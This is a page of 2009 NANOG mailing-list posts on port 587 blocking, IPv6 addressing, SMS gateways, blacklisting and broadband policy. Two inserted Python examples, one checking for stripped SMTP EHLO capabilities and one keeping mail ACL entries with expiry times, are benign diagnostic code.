Re: ISP port blocking practice

2009-10-23 Thread Chris Boyd


On Oct 22, 2009, at 6:14 PM, Lyndon Nerenberg (VE6BBM/VE7TFX) wrote:


My experience is that port 587 isn't used because ISPs block it
out-of-hand.  Or in the case of Rogers in (at least) Vancouver, hijack
it with a proxy that filters out the AUTH parts of the EHLO response,
making the whole point of using the submission service ...  pointless.


We use 587 quite a lot (with SMTP Auth and SSL/TLS), and have found  
_very_ few places block or proxy it.  We don't have any/many customers  
in Rogers service areas though.


The biggest reason people don't use it is that it requires some  
thought and tweaking settings in the advanced tab areas of many  
email clients.  Newer email clients are actually starting to look for  
submission port and SSL support and configuring it automatically if  
they find it.


Once it's set up correctly we've found customers really like it since  
their email just works in most places.


--Chris
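
A way to check a given network path for the EHLO filtering described in the quoted message. This is an added example, not part of the original post: it compares an EHLO reply captured on a known-good path with one captured on the suspect path. The hostnames and both sample replies are constructed, and the masked-keyword pattern is a heuristic.

```python
import re

# Constructed sample replies; hostnames are placeholders, not from the thread.
BASELINE = (
    "250-mail.example.net Hello client.example.org\r\n"
    "250-SIZE 52428800\r\n"
    "250-8BITMIME\r\n"
    "250-STARTTLS\r\n"
    "250-AUTH PLAIN LOGIN\r\n"
    "250 HELP\r\n"
)
FILTERED = (
    "250-mail.example.net Hello client.example.org\r\n"
    "250-SIZE 52428800\r\n"
    "250-8BITMIME\r\n"
    "250-XXXXXXXA\r\n"
    "250 HELP\r\n"
)

_LINE = re.compile(r"^(\d{3})([ -])(.*)$")
# Heuristic: some inspecting middleboxes overwrite a keyword with X's
# instead of deleting the line.
_MASKED = re.compile(r"^X{4,}[A-Z]?$")
SECURITY_KEYWORDS = ("STARTTLS", "AUTH")


def parse_ehlo(reply):
    """Parse a multi-line 250 EHLO reply into {KEYWORD: [PARAMS]}."""
    lines = [l for l in reply.splitlines() if l.strip()]
    if not lines:
        raise ValueError("empty EHLO reply")
    caps = {}
    for i, line in enumerate(lines):
        m = _LINE.match(line)
        if not m:
            raise ValueError("malformed reply line: %r" % line)
        code, sep, text = m.groups()
        if code != "250":
            raise ValueError("EHLO was not accepted: %r" % line)
        is_last = i == len(lines) - 1
        # "250-" marks a continuation line, "250 " the final line.
        if (sep == " ") != is_last:
            raise ValueError("bad continuation marker: %r" % line)
        if i == 0:
            continue  # first line is the greeting, not a capability
        parts = text.split()
        if not parts:
            continue
        keyword = parts[0].upper()
        params = [p.upper() for p in parts[1:]]
        if keyword.startswith("AUTH="):
            # Legacy "AUTH=LOGIN PLAIN" form still sent by some servers.
            params = [p for p in [keyword[5:]] + params if p]
            keyword = "AUTH"
        caps.setdefault(keyword, []).extend(params)
    return caps


def compare(baseline_reply, observed_reply):
    """Return findings for capabilities that vanished on the observed path."""
    base = parse_ehlo(baseline_reply)
    seen = parse_ehlo(observed_reply)
    findings = []
    for kw in SECURITY_KEYWORDS:
        if kw in base and kw not in seen:
            findings.append("%s is offered by the server but missing on this path" % kw)
    if "AUTH" in base and "AUTH" in seen:
        lost = sorted(set(base["AUTH"]) - set(seen["AUTH"]))
        if lost:
            findings.append("AUTH mechanisms removed: " + ", ".join(lost))
    masked = sorted(k for k in seen if _MASKED.match(k))
    if masked:
        findings.append("masked keywords present: " + ", ".join(masked))
    return findings


if __name__ == "__main__":
    for finding in compare(BASELINE, FILTERED):
        print(finding)
```

Capture both replies at the same point in the session (both before STARTTLS, or both after), since many servers advertise AUTH only once TLS is established.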




Re: ISP port blocking practice

2009-10-23 Thread Chris Boyd


On Oct 23, 2009, at 12:15 PM, Lyndon Nerenberg (VE6BBM/VE7TFX) wrote:

As for outright blockage of port 587, I get this complaint from many of
my clients while they are on the road. It seems hotels love to block it.


I travel a bit (used to a lot) and only found one place that proxied  
it.  Never saw an outright block.  A call to the support group  
actually got it fixed in about 45 minutes.  Call and complain if it's  
broken.  You are the customer at that point.


--Chris




Re: ISP/VPN's to China?

2009-10-22 Thread Chris Edwards
On Wed, 21 Oct 2009, Alex Balashov wrote:

| I was not aware that tools or techniques to do this are widespread or highly
| functional in a way that would get them adopted in an Internet access control
| application of a national scope.

Doesn't necessarily have to be hugely accurate.  The authorities could 
simply identify a few likely suspect tunnels, then knock-on-doors and ask 
you to explain what the traffic in question is...




Re: IPv6 Deployment for the LAN

2009-10-21 Thread Chris Adams
Once upon a time, Iljitsch van Beijnum iljit...@muada.com said:
 What we need is a thing that gives us what we need to  
 connect to the network (addresses, DNS servers) and then a pointer in  
 the form of an HTTP or HTTPS URL for all other configuration.

You want to invent yet _another_ form of configuration management?
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: NetFlow analyzer software

2009-10-19 Thread Chris Gotstein
Not sure if this will get you all the info you are looking for, but it's
open source and works well for our needs.

http://nfsen.sourceforge.net/

   
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com

Michael J McCafferty wrote:
 All,
I am looking for decent netflow analyzer and reporting  software with good 
 support for AS data. 
ManageEngine's product crashes or locks up my browser when I try to 
 list/sort the AS info because it's too large of a list and there is no way to 
 tell it to show just the top x results.
Plixer's Scrutinizer, while it seems like it's a pretty decent product, is 
 no longer supporting Linux... We are a Linux shop (servers, desktops, 
 laptops). 
What else is there that I might want to look at?
 
 Thanks!
 Mike
 M5Hosting.com
 Sent from my Verizon Wireless BlackBerry
 



Re: ISP customer assignments

2009-10-15 Thread Chris Adams
Once upon a time, Michael Dillon wavetos...@googlemail.com said:
 And only the largest ISPs will outgrow a /32 allocation.

This brings up something else I'm trying to figure out.  We're not a
huge ISP; I've got our /32 but I don't see us using more.  We have two
main POPs, each with Internet links, plus a link between the two.  Our
IPv4 allocations are larger than the minimum, so I split our IPv4 space
between the two POPs and advertise a smaller block out of the smaller of
the two POPs.

This has worked okay and handles the POP-to-POP link going down; when
that happens, our POP-to-POP traffic (not a large percentage of our
traffic) goes across our Internet connections, but Internet traffic for
each POP goes directly to the POP.

With IPv6, we've got our single /32.  From what I understand, if I try
to advertise a /33 from the smaller POP, many (most?) will drop it (if
my upstreams even take it).  If I advertise the /32 from both routers,
when that link goes down, my IPv6 traffic will be pretty much hosed.

Is there any good solution to this?  I don't expect us to fill the /32
to justify expanding it (although I do see ARIN appears to have left
space for up to a /29; I guess that's their sparse allocation policy?).

I guess this is traffic engineering, although I'm not deaggregating to
try to control how much goes where, just to ensure connectivity in the
face of failures.  This link has been pretty reliable lately (since the
telco re-engineered it), but it was flakey as hell a while back (when it
went through 7 companies to go between cities 90 miles apart).

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: ISP customer assignments

2009-10-13 Thread Chris Hills

On 13/10/09 15:33, Justin Shore wrote:

He didn't really give much of a reason for the /127s yet. I think it's
coming up in a later session. I think it basically boiled down to
whether or not the customer would actually use anything bigger. I'll
write back when we get into that discussion.


Anything other than /64 removes the possibility of using privacy (aka 
temporary) addresses, enabled on Vista and above by default 
(net.ipv6.conf.all.use_tempaddr on Linux). For a single prefix a host 
may have by default up to 8 global unicast addresses - 1 EUI-64 and 7 
privacy.





Re: IPv6 in the ARIN region

2009-10-13 Thread Chris Gotstein
We are running IPv6 over 209 currently.

2607:F8E8::/32

   
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com

David Temkin wrote:
 I contacted 209 yesterday (due to the ongoing Cogent/174 silliness) and it
 seems like they are willing to turn up customer-facing v6, but have made it
 a sales process (versus a technical request) and so that complicates things.
 
 -Dave
 
 On Tue, Oct 13, 2009 at 8:27 AM, Seth Mattinen se...@rollernet.us wrote:
 
 New thread: who will route the full IPv6 table? So far I'm seeing PI
 /48's out of 2620:0:/23 from:

 NTT, 2914
 AT&T, 7018
 Sprint, 1239 and 6175
 Hurricane, 6939
 Level 3, 3356
 Global Crossing, 3549
 Qwest, 209

 Did I miss anyone? Qwest only carries one route (out of 4 total) though,
 don't know if that's an exception or they only have one ARIN PI customer.

 ~Seth





Re: IPv6 in the ARIN region

2009-10-13 Thread Chris Spears


David Temkin wrote:

I contacted 209 yesterday (due to the ongoing Cogent/174 silliness) and it
seems like they are willing to turn up customer-facing v6, but have made it
a sales process (versus a technical request) and so that complicates things.

-Dave

On Tue, Oct 13, 2009 at 8:27 AM, Seth Mattinen se...@rollernet.us wrote:


New thread: who will route the full IPv6 table? So far I'm seeing PI
/48's out of 2620:0:/23 from:

NTT, 2914
AT&T, 7018
Sprint, 1239 and 6175
Hurricane, 6939
Level 3, 3356
Global Crossing, 3549
Qwest, 209

Did I miss anyone? Qwest only carries one route (out of 4 total) though,
don't know if that's an exception or they only have one ARIN PI customer.

~Seth





Qwest still considers this a beta service.  They're routing our /32, but 
we're still preferring our other peerings.


Not to point fingers, but Force10 is advertising a /64 that HE (and 
subsequently Qwest & others) are accepting.  I'd suspect they'll accept 
most anything.


  2620:0:380::/48     x:x:x::x   1537   209 6939 18508 I
  2620:0:380:2::/64   x:x:x::x   1537   209 6939 18508 393222 I




--
Chris




Re: ISP customer assignments

2009-10-13 Thread Chris Adams
Once upon a time, Michael Dillon wavetos...@googlemail.com said:
  How many addresses do you like on point-to-point circuits?
 
 That will become one of those great interview questions, because anyone who
 says something like a /127 or a /64 will be someone that you probably
 don't want to hire.
 
 The right answer is to explain that there are some issues surrounding
 the choice of addressing on point-to-point circuits and there has even
 been an RFC published discussing these issues, RFC 3627
 http://www.ietf.org/rfc/rfc3627.txt

Still learning here, so please go easy...

I read the above, and I see section 4 item 3 says:

   The author feels that if /64 cannot be used, /112, reserving the last
   16 bits for node identifiers, has probably the least amount of
   drawbacks (also see section 3).

I guess I'm missing something; what in section 3 is this referring to?
I can understand /64 or /126 (or maybe /124 if you were going to
delegate reverse DNS?), but why /112 and 16 bits for node identifiers
on a point-to-point link?
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: ISP customer assignments

2009-10-13 Thread Chris Adams
Once upon a time, Leo Bicknell bickn...@ufp.org said:
 2) Colons separate 16 bit chunks in IPv6.  /112's allow ::1,
 ::2 to be your IP's.

Yeah, this is what I forgot about.  Makes sense now.

Another (quite possibly dumb :-) ) few questions come to mind about IPv6
assignment:

I would expect you just assign static addresses to servers.  Are there
pros/cons to using /64 or something else there?  If I'm statically
assigning IP (and DNS, etc. servers) info, why would I not just
configure the gateway there as well (especially if you just make all
local router interfaces ::1)?

What about web-hosting type servers?  Right now, I've got a group of
servers in a common IPv4 subnet (maybe a /26), with a /24 or two routed
to each server for hosted sites.  What is the IPv6 equivalent?  I can
see a /64 for the common subnet, but what to route for aliased IPs for
web hosts?  It is kind of academic right now, since our hosting control
panel software doesn't handle IPv6, but I certainly won't be putting
2^64 sites on a single server.  Use a /112 here again as well?  Use a
/64 per server because I can?

What about anycast-type addresses (e.g. DNS servers)?  I route a few
server IPv4 /32s around in my network; do you assign a /128, a /64 (with
only one address in use), a /112, or something else?

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: ISP customer assignments

2009-10-13 Thread Chris Adams
Once upon a time, Nathan Ward na...@daork.net said:
 On 14/10/2009, at 2:14 PM, Chris Adams wrote:
 What about web-hosting type servers?  Right now, I've got a group of
 servers in a common IPv4 subnet (maybe a /26), with a /24 or two routed
 to each server for hosted sites.  What is the IPv6 equivalent?  I can
 see a /64 for the common subnet, but what to route for aliased IPs for
 web hosts?  It is kind of academic right now, since our hosting control
 panel software doesn't handle IPv6, but I certainly won't be putting
 2^64 sites on a single server.  Use a /112 here again as well?  Use a
 /64 per server because I can?
 
 Why route them to the servers? I would just put up a /64 for the web  
 servers and bind addresses to your ethernet interface out of that /64  
 as they are used by each site.
 I guess you might want to route them to the servers to save ND entries  
 or something on your router?

In the past, we saw issues with thousands of ARP entries (it has been a
while and I don't remember what issues now though).  Moving a block from
one server to another didn't require clearing an ARP cache (and
triggering a couple of thousand new ARP requests).

Also, it is an extra layer of misconfiguration-protection: if the IPs
are routed, accidentally assigning the wrong IP on the wrong server
didn't actually break any existing sites (and yes, that is a lesson from
experience).

Of course, with IPv4, you never assigned a large enough block to begin
with that would anticipate all growth, so routing additional blocks was
a lot easier than changing blocks, cleaner than secondary IPs
multiplying like crazy, etc., etc.  None of that would be an issue with
a single /64.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: ISP customer assignments

2009-10-05 Thread Chris Owen

On Oct 5, 2009, at 1:43 PM, Wayne E. Bouchard wrote:


Whenever you declare something to be inexhaustible all you do is
increase demand. Eventually you reach a point where you realize that
there is, in fact, a limit to the inexhaustible resource.


This is where I think there is a major disconnect on IPv6.   The size  
of the pool is just so large that people just can't wrap their heads  
around it.


2^128 is enough space for every man, woman and child on the planet to  
have around 4 billion /64s to themselves.   Even if we assume everyone  
might possibly need say 10 /64s per person that still means we are  
covered until the population hits around 2,600,000,000,000,000,000.


Chris

-
Chris Owen - Garden City (620) 275-1900 -  Lottery (noun):
President  - Wichita (316) 858-3000 -A stupidity tax
Hubris Communications Inc  www.hubris.net
-







Re: OT: iPhone Problems

2009-10-04 Thread Chris Burwell
MMS or quality control: pick one! :)

On 10/4/09, Clue Store cluest...@gmail.com wrote:
 Mine's rebooted at least 3 times a day since the upgrade :(

 What ever happened to quality control

 http://discussions.apple.com/thread.jspa?threadID=2152619&tstart=0


-- 
Sent from my mobile device



Gmail Down?

2009-09-24 Thread Chris Gotstein
Anyone else seeing Google's Gmail down right now?  Seems to have been
down since 10am CST.  We are connected through Chicago.
downforeveryoneorjustme.com is also reporting it's down.

-- 
   
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com



Re: Gmail Down?

2009-09-24 Thread Chris Gotstein
It was short-lived, seems to be back up now, but a little flaky.

   
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com

Chris Gotstein wrote:
 Anyone else seeing Google's Gmail down right now?  Seems to have been
 down since 10am CST.  We are connected through Chicago.
 downforeveryoneorjustme.com is also reporting it's down.
 



Re: Gmail Down?

2009-09-24 Thread Chris Gotstein
We don't use gmail for any of our services, but a lot of our ISP
customers use gmail.  So when they see gmail being down, they assume
that their internet connection is down or that we are the reason that
gmail is not working.

   
Chris Gotstein, Sr Network Engineer, UP Logon/Computer Connection UP
http://uplogon.com | +1 906 774 4847 | ch...@uplogon.com

Harald Koch wrote:
 It does appear that gmail going down leads to a DoS against the NANOG
 list. :-)
 



Re: SMS

2009-09-22 Thread Chris Adams
Once upon a time, Alex Balashov abalas...@evaristesys.com said:
 Shane Ronan wrote:
 On that same note, can someone point me in the direction of an SMS 
 gateway service? I would like to be able to send SMS messages from my 
 monitoring systems, but I am unsure about how to go about it.
 
 Why not use an e-mail to SMS gateway from whichever carrier?

They tend to be unreliable (long delays and dropped messages).  Also,
how can your monitoring system email the gateway when the network is
down?
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: SMS

2009-09-22 Thread Chris Adams
Once upon a time, William Herrin herrin-na...@dirtside.com said:
 The Multitech Multimodem GPRS model MTCBA-G-EN-F4 has an ethernet
 port. Add a SIM card from your favorite wireless carrier and you can
 send and receive SMS messages via AT commands over a TCP socket.
 Problem is, it seizes up or otherwise founders every few weeks and has
 to be power cycled.
 
 Has anyone heard of other products with a good reliability record?

We have the MTCBA-G-U-F4-ED (the USB version) and have not had any
trouble.  I had to modify the Linux kernel driver for the chipset used
to load the firmware correctly (and optionally externally instead of
just compiled in), but those changes are in the upstream kernel now.

We haven't had any problem with it locking up or anything; the server
with it attached has been up for a year (as of 41 minutes ago :-) ) with
no problems (haven't had to pull the modem or anything like that).

We have an AT&T SIM card in it, and we did have problems with AT&T's SMS
several months ago; for several hours, they were rejecting messages from
our modem.  Now I have an additional monitor that sends a message to
itself periodically, and (of course) we haven't had that problem since.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Hijacked Blocks

2009-09-14 Thread Chris Marlatt
Christopher Morrow wrote:
 The end of the discussion was along the lines of: Yes, we know this
 guy is bad news, but he always comes to us with the proper paperwork
 and numbers, there's nothing in the current policy set to deny him
 address resources. Happily though he never pays his bill after the
 first 12 months so we just reclaim whatever resources are allocated
 then.  (yes, comments about more address space ending up on BL's were
 made, and that he probably doesn't pay because after the first 3
 months the address space is 'worthless' to him...)
 
 How should this get fixed? Is it possible to make policy to address
 this sort of problem?
 
 -chris
 

If this is the case one could argue that ARIN should be reserving this
worthless address space to be used when they receive similar requests
in the future. There's no reason personX should get fresh, clean address
space when they make additional requests.

Regards,

Chris



Re: Repeated Blacklisting / IP reputation

2009-09-09 Thread Chris Hills

On 08/09/09 21:34, Joe Greco wrote:

Show me ONE major MTA which allows you to configure an expiration for
an ACL entry.


This is fairly trivial to do with Exim by storing your acl entries in a 
database or directory with a field/attribute for expiry, and an 
appropriate router configuration. No doubt you could implement this 
using a small script for any MTA. The upside of using a db/ldap backend 
is that it makes it easy to inter-operate with other things like your nms.
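
A sketch of the "database with an expiry field" approach described above, as an added example that is not part of the original post and is not Exim configuration. The table layout, function names and sample networks are assumptions made for illustration; an MTA policy hook or a cron job would call `match` and `purge_expired`.

```python
import ipaddress
import sqlite3


def open_store(path=":memory:"):
    """Open (or create) the ACL store. expires_at NULL means permanent."""
    conn = sqlite3.connect(path)
    conn.execute(
        "CREATE TABLE IF NOT EXISTS acl ("
        " network TEXT NOT NULL,"
        " reason TEXT NOT NULL,"
        " added_at INTEGER NOT NULL,"
        " expires_at INTEGER)"
    )
    return conn


def add_entry(conn, network, reason, now, ttl=None):
    """Add a block entry; ttl is in seconds, None for no expiry."""
    net = ipaddress.ip_network(network, strict=False)  # normalises host bits
    expires_at = None if ttl is None else now + ttl
    conn.execute(
        "INSERT INTO acl (network, reason, added_at, expires_at)"
        " VALUES (?, ?, ?, ?)",
        (str(net), reason, now, expires_at),
    )
    conn.commit()


def match(conn, client_ip, now):
    """Return the most specific unexpired entry covering client_ip, or None."""
    addr = ipaddress.ip_address(client_ip)
    rows = conn.execute(
        "SELECT network, reason, expires_at FROM acl"
        " WHERE expires_at IS NULL OR expires_at > ?",
        (now,),
    )
    best = None
    for network, reason, expires_at in rows:
        net = ipaddress.ip_network(network)
        if net.version != addr.version or addr not in net:
            continue
        if best is None or net.prefixlen > best["prefixlen"]:
            best = {
                "network": network,
                "reason": reason,
                "expires_at": expires_at,
                "prefixlen": net.prefixlen,
            }
    return best


def purge_expired(conn, now):
    """Delete entries whose expiry has passed; return how many were removed."""
    cur = conn.execute(
        "DELETE FROM acl WHERE expires_at IS NOT NULL AND expires_at <= ?",
        (now,),
    )
    conn.commit()
    return cur.rowcount


if __name__ == "__main__":
    DAY = 86400
    t0 = 1_000_000  # constructed clock value so the run is repeatable
    store = open_store()
    # Constructed sample entries using documentation address ranges.
    add_entry(store, "192.0.2.0/24", "spam run", t0, ttl=7 * DAY)
    add_entry(store, "2001:db8::/32", "manual block", t0)
    print(match(store, "192.0.2.10", t0 + DAY))      # still listed
    print(match(store, "192.0.2.10", t0 + 8 * DAY))  # expired, no match
    print(purge_expired(store, t0 + 8 * DAY))        # stale rows removed
```

Because `match` filters on `expires_at` itself, an entry stops applying at its expiry time even if the purge job has not run yet.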





Re: Telstra issues

2009-09-03 Thread Chris Hills

On 03/09/09 07:47, Mark Newton wrote:

We run one which isn't connected to Telstra :-)

There are media reports this morning of major outages in Telstra's domestic
network.
http://www.australianit.news.com.au/story/0,24897,26021106-15306,00.html


Thank goodness PPC-1 is nearing completion, eh?

http://www.pipeinternational.com/index.php?option=com_myblog&Itemid=65





Re: Ready to get your federal computer license?

2009-08-31 Thread Chris Grundemann
On Sun, Aug 30, 2009 at 20:28, Steven M. Bellovins...@cs.columbia.edu wrote:
 On Sun, 30 Aug 2009 22:20:55 -0400
 Eric Brunner-Williams brun...@nic-naa.net wrote:

 randy,

 moveon is a maine-based org. it is an effective, fund raising,
 partisan organization. it is much more than a click-and-opine
 vehicle, it puts hundreds of thousands of dollars into competitive
 races, and has a competent political director.

 to create a NagOn we would have to hire or appoint a political
 director, and a financial director, and charge each with framing the
 issue, and executing a seven figure plan, and a communications
 director, to put the message with the money in targeted media
 markets, and finally, to show teeth, drop the margin of error, or on
 the order of high five, low six figures, in targeted congressional
 races, for challengers and incumbents.

 in about a year after starting down this path, the Congressman, its
 NagOn on line one conversation would be slightly different from
 today, and in several years time, more so.

 A journey of a thousand miles begins with a single step.

 I don't know that a NagOn is the best way or the only way to make
 progress.  I do know that the most likely source of that kind of
 funding is (many of) our employers, who may not have technical
 excellence on the top of their lists.  But I'm even more certain that
 if technical people never speak up, their message will never be heard,
 except perhaps by accident.

                --Steve Bellovin, http://www.cs.columbia.edu/~smb



I believe that this is exactly the kind of thing that the US ISOC
Chapters should be (and are to varying degrees) involved in --
providing legitimate technical information and expert analysis of
local, state and federal policies which impact the Internet, to those
making the policies.  The global ISOC already does this for ICANN and
other international organizations, it seems fitting that the chapters
do more of this here inside the USA.

I encourage everyone with even a fleeting interest in tech-policy to
seek out their local ISOC chapter
(http://www.isoc.org/isoc/chapters/list.php?region=worldwide&status=A)
and let them know that you care.  I can tell you as the founding chair
of the Colorado chapter that my largest hurdle today is getting active
members to participate - I have funding, etc, just no help...  (I
invite everyone to contact me directly with suggestions and ideas in
this vein - I have some vehicles in place to start making this happen
quickly with a bit of help)

/soapbox
~Chris

-- 
Chris Grundemann
weblog.chrisgrundemann.com
www.burningwiththebush.com
www.coisoc.org



Re: Ready to get your federal computer license?

2009-08-29 Thread Chris Grundemann
On Sat, Aug 29, 2009 at 06:57, Scott Morriss...@emanon.com wrote:
 I must have missed the phrasing that says nobody else can make an
 independent decision regarding any security measure above and beyond the
 minimum standards...

 I'll go back and look for that.



 Scott


 Florian Weimer wrote:
 * Scott Morris:


 I'm trying really hard to find my paranoia hat, and just to relieve
 some boredom I read the entire bill to try to figure out where this was
 all coming from

 (2) may declare a cybersecurity emergency and order the limitation or
 shutdown of Internet traffic to and from any compromised Federal
 Government or United States critical infrastructure information system
 or network;


 Wouldn't this mean you're allowed to set emergency ACLs only if a
 cybersecurity emergency has been declared by the President?





The EFF summed up the problems with the bill's current text quite well
I believe (without any tin-foil hats required): The Cybersecurity Act
is an example of the kind of dramatic proposal that doesn't address
the real problems of security, and can actually make matters worse by
weakening existing privacy safeguards – as opposed to simpler,
practical measures that create real security by encouraging better
computer hygiene. -
http://www.eff.org/deeplinks/2009/04/cybersecurity-act

$0.02
~Chris


-- 
Chris Grundemann
weblog.chrisgrundemann.com
www.burningwiththebush.com
www.coisoc.org



Re: FCCs RFC for the Definition of Broadband

2009-08-28 Thread Chris Adams
Once upon a time, Daniel Senie d...@senie.com said:
 Before you get too hung up on the emergency phone thing, take a hard  
 look at the present day. The telcos pushed SLC gear out everywhere.  
 Those have batteries, but at least in some areas, no maintenance was  
 done, batteries died, and when the power went out, so did the phones.  
 The SLCs had generator plug-in setups to be used in an emergency, but  
 in any natural disaster, it's unlikely there'd be enough portables  
 deployed and maintained by the telco to keep the multiplexors alive.  

Around here, most BellSouth cabinets have a natural gas generator as
part of the setup, so they stay up as long as the gas lines are good
(and if something has happened to both the power lines and the gas
service, it probably doesn't matter much anyway).

We had a fairly large power outage here a few months ago that affected
just about everybody except for my house and my sister's house (we're
only a mile or so apart).  Neither of us even knew the power was out
until we left our houses.  Her Comcast cable was out (my Knology
wasn't), so she decided to go to the store (I just happened to also go
out at the same time).

Sticking with BellSouth/AT&T for phone service (and DSL for Internet)
wasn't such a bad idea after all.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: FCCs RFC for the Definition of Broadband

2009-08-28 Thread Chris Adams
Once upon a time, Peter Beckman beck...@angryox.com said:
  And where does that fiber go to?  Home runs from a central point in the
  development, so any provider can hook up to any house at the street?
  Deregulation means those lines should be accessible to any company for a
  fee.  How do you give House A Verizon and House B Cox, especially if Cox
  doesn't support fiber?

I have two cable TV providers available at my house.  They each have
their own cable plant in my neighborhood; there are two runs in each
easement, two sets of pylons for access (although they mostly alternate
yards, so they aren't digging at the same place when burying new wires).
If you switch from one to the other, the new one runs a new wire from
their nearest tap and sends somebody else around in a few weeks to
bury (under maybe 2 of dirt) the wire.

On my block, the cable lines are at the back edge of the yard, running
between the houses (down the middle of the block), while the phone
company wires run along the easement at the front edge of the yard with
the utility (power/water/sewer) lines.  Not sure why it was done that
way, except maybe to keep the cable guys from digging up important stuff
on a regular basis (since people switch cable a lot).

However, I've seen pictures of the old power lines in New York City and
such, when there were a dozen or more power companies.  I sure wouldn't
want to see anything like that again.

IMHO, we'd be better off with a public utility that manages nothing but
the cable plant, running one set of wires (a few copper pairs, a coax or
two, and a couple of fiber pairs) to each house, and then selling equal
access to all takers (ILEC, CLEC, cable TV, direct to ISPs, etc.).  The
utility would be banned from selling any kind of service themselves, and
would be a non-profit; they'd charge everybody the same fees for access
to the same type of cable and they'd maintain the plant and colo
facilities.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: Qwest IPv6

2009-08-27 Thread Chris Gotstein
Qwest is still beta testing IPv6.  We turned ours up last week and were 
one of the first to do so.  I can go through my notes and email you the 
contact info of the people that are working on that.


Kevin Brown wrote:


Does anyone have a contact at Qwest who can help us get the ball rolling 
to implement an exchange of IPv6 traffic?  Their NOC referred us back to 
our account manager, who said "We don't do IPv6."  A quick Google search 
would seem to indicate otherwise...


Thanks!



--
Chris Gotstein
Sr Network Engineer
UP Logon/Computer Connection UP
500 N Stephenson Ave
Iron Mountain, MI 49801
Phone: 906-774-4847
Fax: 906-774-0335
ch...@uplogon.com



Re: Qwest IPv6

2009-08-27 Thread Chris Adams
Once upon a time, Kevin Brown ke...@qis.net said:
 Does anyone have a contact at Qwest who can help us get the ball rolling 
 to implement an exchange of IPv6 traffic?  Their NOC referred us back to 
 our account manager, who said "We don't do IPv6."  A quick Google search 
 would seem to indicate otherwise...

When I asked a few months ago, the NOC gave me the "we don't do IPv6"
answer.  Looking at BGP, I only see AS 209 behind HE (with 1 prefix and
2 transit prefixes), so I would guess that's still basically the case.
-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: FCCs RFC for the Definition of Broadband

2009-08-27 Thread Chris Adams
Once upon a time, Leo Bicknell bickn...@ufp.org said:
 When the original
 rural telephone network was pushed ROI's of 50 years were talked about.
 There's plenty of infrastructure built every day with ROI's of 20 years.

How much of that was built in the last 15 years though (where now it
needs to be replaced before it has been paid for)?  In the 1990s,
BellSouth pushed hard here, rolled out fiber to the neighborhoods, and
deployed ISDN-capable equipment everywhere.  ISDN was available at every
single address in town by around 1995 (allegedly we were one of if not
the first moderate-sized city with ISDN everywhere).

Then it turned out ISDN was a flop, and DSL came along, which wouldn't
run over that nice big fiber plant.  They had to start rolling out
remote DSLAMs all over town.  Shortly after they had most of the city
covered, ADSL2 came along, and they had to start upgrading again.

Granted, the cable plant (whether copper, fiber, coax, or avian
datagram) is not quite the same, but the bean-counters look at it as "we
were supposed to have bignum-year ROI on project 1, 2, and 3, and we
didn't get it; why should I believe we'll get it on project 4?".

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



Re: FCCs RFC for the Definition of Broadband

2009-08-26 Thread Chris Adams
Once upon a time, jim deleskie deles...@gmail.com said:
 Why should one person be disadvantaged from another in the same country,
 maybe its the Canadian in me, but isn't there something in the
 founding documents of the US that defines all men as being equal.

Nobody is forcing anybody to live out where high-speed Internet is not
currently feasible (or at least not at a price that those residents want
to pay).  I live half a mile from a six lane highway; that doesn't mean
that we have to build six lane highways to within half a mile of
everybody in the country.

-- 
Chris Adams cmad...@hiwaay.net
Systems and Network Administrator - HiWAAY Internet Services
I don't speak for anybody but myself - that's enough trouble.



RE: F5/Cisco catalyst configuration question

2009-08-20 Thread Chris Lowe
That is what I was thinking when I first read your email.  I would agree
with Darren.
CL

-Original Message-
From: Dylan Ebner [mailto:dylan.eb...@crlmed.com] 
Sent: Thursday, August 20, 2009 10:36 AM
To: Scott Spencer; 'Darren Bolding'; 'Christopher Greves'
Cc: nanog@nanog.org
Subject: RE: F5/Cisco catalyst configuration question

This couldn't be something as simple as a crossover cable, could it?

 

-Original Message-
From: Scott Spencer [mailto:sc...@dwc-computer.com] 
Sent: Thursday, August 20, 2009 11:24 AM
To: 'Darren Bolding'; 'Christopher Greves'
Cc: nanog@nanog.org
Subject: RE: F5/Cisco catalyst configuration question

Darren,
 
It's the F5-BIG-LTM-6400, pair of them.
Thanks for your info. Got a lot of good, helpful responses.
 
Best regards,
 
Scott Spencer
Data Center Asset Recovery/Remarketing Manager Duane Whitlow  Co. Inc.
Nationwide Toll Free: 800.977.7473.  Direct: 972.865.1395  Fax:
972.931.3340  mailto:sc...@dwc-computer.com sc...@dwc-computer.com
http://www.dwc-it.com/ www.dwc-it.com 
Cisco/Juniper/F5/Foundry/Brocade/Sun/IBM/Dell/Liebert and more ~   
 

  _  

